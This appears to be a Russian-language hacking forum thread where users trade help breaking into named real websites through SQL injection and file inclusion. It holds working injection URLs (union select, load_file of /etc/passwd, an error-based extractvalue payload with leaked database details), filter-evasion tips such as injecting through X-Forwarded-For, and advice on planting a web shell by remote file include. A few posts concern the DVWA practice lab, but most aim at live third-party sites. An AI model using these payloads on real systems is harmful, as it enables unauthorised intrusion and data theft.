1: WHERE (name_ru LIKE '%name') order by{sql-запрос}#%' OR product_code LIKE '%'%') AND... 2: WHERE (name_ru LIKE '%'%' OR product_code LIKE '%name') order by{sql-запрос}'#%') AND... P.S: Тут провидцев нет, давай урл и вывод ошибки!
old.islam.kg/?i=1'&lg=kg Помогите со скулей плз. Еще возможно IP записывает, так что.. p.s. ip конечно изменен
Там режутся пробелы, /**/, пробывал еще такие варианты - %09,%0A,%0B,%0C,%0D , при них запрос как бы "вырезается", фильтруются также (). Если найдеш способоб обойти фильтр пробелов, то скорейвсего раскрутишь если она не слепая конечно. По ip еще, у меня сейчас нет возможности проверить, но попробуй сам отправить в хедерах свой X-FORWARDED-FOR с sql inj, если повезет и ip у них определяется именно так, то может там и условия получше будут.
Скулю обработал - http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,10,11+--+ но запара - фильтрация кавычек - file_priv считать ну никак не получается
есть какой-нибудь мануал или статья о том как залиться если file_priv=Y но magic_quotes_gpc = on зы это читал ,но не понял логику запросов https://forum.antichat.ru/showpost.php?p=663815&postcount=39
Magic Quotes = On Code: http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,'10',11+--+ False File_Priv=N Code: http://pcmcia.ru/?do=form&id=2+and+1=0+union+select+1,2,3,4,5,6,7,8,9,load_file(0x2f6574632f706173737764),11+--+ False Саму БД не смотрел - мож там админка есть... Это прокатывает только при двойном запросе и то, при варианте, что данные передаваемые из первого запроса во второй дополнительно не фильтруются.
Тут вся проблема в том, что магические кавычки включены Остаётся вариант Error-Based Твой запрос имеет вид Code: SELECT m.*, m.name_ru AS subName, m.name_eng AS name, m.ext_id AS id FROM l2_monsters_rg AS m JOIN l2_monsters_skills AS strt ON (strt.npc_id=m.ext_id and strt.skill_id=4309) JOIN l2_drops_rg AS `drop` ON (`drop`.npc_id=m.id and `drop`.item_id in (SELECT id FROM l2_items_rg WHERE name_eng like '%[COLOR=Red][INJECT][/COLOR]')) WHERE m.lvl BETWEEN 21 and 30 AND m.name_eng!='' and m.type in ("warrior", "treasure", "boss", "zzoldagu", "") ORDER BY m.lvl; и всё бы хорошо, в теории должен бы был проканать запрос вида Code: SELECT m.*, m.name_ru AS subName, m.name_eng AS name, m.ext_id AS id FROM l2_monsters_rg AS m JOIN l2_monsters_skills AS strt ON (strt.npc_id=m.ext_id and strt.skill_id=4309) JOIN l2_drops_rg AS `drop` ON (`drop`.npc_id=m.id and `drop`.item_id in (SELECT id FROM l2_items_rg WHERE name_eng like '%[COLOR=Red]\\')) or (select count(*) from l2_drops_rg group by concat(version(),floor(rand(0)*2))+--+[/COLOR]%')) WHERE m.lvl BETWEEN 21 and 30 AND m.name_eng!='' and m.type in ("warrior", "treasure", "boss", "zzoldagu", "") ORDER BY m.lvl; но в нашем случае хвост запроса не отбрасывается никаким способом. Во всяком случае - я пока не нашёл способа инъекта. P.S. Поправьте меня, если я ошибаюсь. P.S S. cat1vo красава ! А у меня сёдня бошка вообще не варит после картошки =(
Дальше думаю сами сможете? Code: http://www.l2db[dot]ru/npc/index/2/rg/all/all/8/all/\'))+and+extractvalue(1,concat(0x3a,version()))+--+- Version: 5.1.52-log DB_user: [email protected] Current_db: l2dbtest to BigBear, поправил, Вы ошибались!
Народ нужен хелп, LFI вроде есть, но не выводится ниче. deabloz.com/modules/boonex/poll/index.php?aModule= Пробую данный сплоит: 1337day.com/exploits/14663
что то не получается раскрутить,может кто подсказать http://www.turboklicker.de/index.php?content=/nickpage&id=2
Указывайте, пожалуйста, параметры в которых вы подозреваете инъекцию. И способы, которые вы пробовали для их раскрутки.
Есть сайт, в при входе на него твой айпи просто проверяется в базе и если найден то Die, айпи проверяется по HTTP_X_FORWARDED_FOR, который можно заменить в хттп заголовке Но если запрос успешен то он просто он ничего не выводит. Прав за напись нету. Самая главная проблема вот в чем, фильтруется ',' и ';' и фильтруется таким образом, что было до нее обрезает впрочь. т.е: x-forwarded-for: UNION SELECT ALL (SELECT, * FROM banned) -- AND users='" А ответ MySQL ERROR 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '", 95.134.22.54'' at line 1 #0 mysql_exec(select * from banned where ip='* FROM banned) -- AND users='", Айпи тут был')
Спасибо. Подскажите с SQL inj в DVWA level medium http://localhost/dvwa/vulnerabilities/sqli/?id=1'+UnIoN+sElECT+1,2--+&Submit=Submit выводит '\' - с таким еще не сталкивался. в статьях вроде про обходы не пишут upd. разобрался. успешно прошел запрос: только не понимаю, как я это обошел, подскажите плиз. upd2. перешел на high. его реально пройти вообще? как выполнить xss?
Почитай про Magic Quotes А вот тут можно прочитать про отличия инъекций в строковом параметре от инъекций в числовом параметре
здравствуйте. www.site1.ru/index.php?page=http://www.site2.ru срабатывает и подгружает site2 вместе с site1.везде тут в статьях написано ура супер круто мы получили веб шелл.но чета подробнее об этом не нашел. вопрос таков.что делать дальше) я так понимаю теперь необходимо залить на some хостинг файлик shell.php и составить запрос типа http://site1.ru/index.php?page=http://www.site2.ru/shell - без расширения на конце. это и будет наш шелл? я правильно все понимаю? если нет пните в правильную сторону)
mod_ вероятнее там ссылка открывается в iframe а не инклуд и тп, разберись, попробуй подключить php файлы